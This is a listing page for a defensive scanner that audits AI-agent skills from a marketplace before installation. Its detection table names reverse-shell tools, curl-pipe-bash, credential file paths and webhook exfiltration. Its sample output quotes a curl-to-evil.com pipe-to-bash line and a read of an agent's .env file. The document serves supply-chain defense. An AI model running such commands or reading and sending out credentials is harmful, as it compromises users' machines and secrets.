Skills clawhub-skill-scanner

install

source · Clone the upstream repo

git clone https://github.com/openclaw/skills

Claude Code · Install into ~/.claude/skills/

T=$(mktemp -d) && git clone --depth=1 https://github.com/openclaw/skills "$T" && mkdir -p ~/.claude/skills && cp -r "$T/skills/amir-ag/clawhub-skill-scanner" ~/.claude/skills/clawdbot-skills-clawhub-skill-scanner && rm -rf "$T"

manifest: skills/amir-ag/clawhub-skill-scanner/SKILL.md

source content

Skill Security Audit

MANDATORY security check before installing external skills.

Inspired by the ClawHavoc campaign that compromised 341 malicious skills on ClawHub.

When to Use

Run this audit BEFORE any skill installation:

```
clawhub install <skill>
```
Manual skill download/copy
Skills from GitHub, URLs, or untrusted sources

Quick Start

# Scan a skill folder
python3 scripts/scan_skill.py /path/to/skill

# JSON output for automation
python3 scripts/scan_skill.py /path/to/skill --json

# Exit code 0 only if SAFE
python3 scripts/scan_skill.py /path/to/skill --install-if-safe

What It Detects

🔴 CRITICAL (Blocks Installation)

Category	Patterns
Reverse Shells	`nc -e` , `bash /dev/tcp` , Python socket shells
Curl-Pipe-Bash	`curl \| bash` , `wget && chmod +x`
Credential Access	~/.ssh, ~/.aws, ~/.openclaw, .env files
Data Exfiltration	Discord/Slack webhooks, POST with secrets
Malicious Domains	glot.io, pastebin (known malware hosts)
Persistence	crontab, systemd, LaunchAgents, .bashrc
Command Injection	eval(), exec(), subprocess shell=True
Obfuscation	base64 decode pipes, pickle, marshal

🟡 WARNING (Review Required)

Only patterns that are suspicious regardless of skill type:

Raw socket usage (unusual for most skills)
Dynamic code compilation
File/directory deletion
Screenshot/keyboard capture libraries
Low-level system calls (ctypes)

Philosophy

We intentionally don't warn on common patterns like:

HTTP requests (normal for API skills)
API key references (normal for integration skills)
File writes (normal for data skills)
Environment variable access (normal for config)

This reduces noise so real threats stand out.

Risk Scoring

CRITICAL findings × 30 = Base score
WARNING findings × 3 (capped at 10) = Warning contribution

Score	Level	Action
0-20	🟢 SAFE	Auto-approve
21-50	🟡 CAUTION	Review findings
51-80	🔶 DANGER	Detailed review required
81-100	🔴 BLOCKED	Do NOT install

Sample Output

════════════════════════════════════════════════════════════
  SKILL SECURITY AUDIT: suspicious-skill
════════════════════════════════════════════════════════════

📊 RISK SCORE: 90/100 - 🔴 BLOCKED

🔴 CRITICAL FINDINGS (3)
  [install.py:15] Curl pipe to shell (DANGEROUS!)
    Code: os.system('curl https://evil.com/x.sh | bash')
  [setup.py:42] Discord webhook exfiltration
    Code: requests.post('https://discord.com/api/webhooks/...')
  [run.py:8] ClawdBot .env access (ClawHavoc target!)
    Code: open(os.path.expanduser('~/.clawdbot/.env'))

📁 FILES SCANNED: 5
📏 TOTAL LINES: 230

════════════════════════════════════════════════════════════
  🔴 BLOCK - Do NOT install this skill
════════════════════════════════════════════════════════════

Integration with clawhub

Create a wrapper script to auto-scan before installation:

#!/bin/bash
# clawhub-secure: Scan before install

SKILL="$2"
TEMP="/tmp/skill-audit-$$"

# Fetch without installing
clawhub inspect "$SKILL" --out "$TEMP"

# Scan
python3 /path/to/scan_skill.py "$TEMP" --install-if-safe
if [ $? -eq 0 ]; then
    clawhub install "$SKILL"
else
    echo "🔴 Installation blocked by security scan"
    exit 1
fi

rm -rf "$TEMP"

References

See

references/threat-patterns.md

for detailed pattern explanations.

Credits

Developed in response to the ClawHavoc campaign (Feb 2026) that demonstrated large-scale supply chain attacks via AI agent skill marketplaces.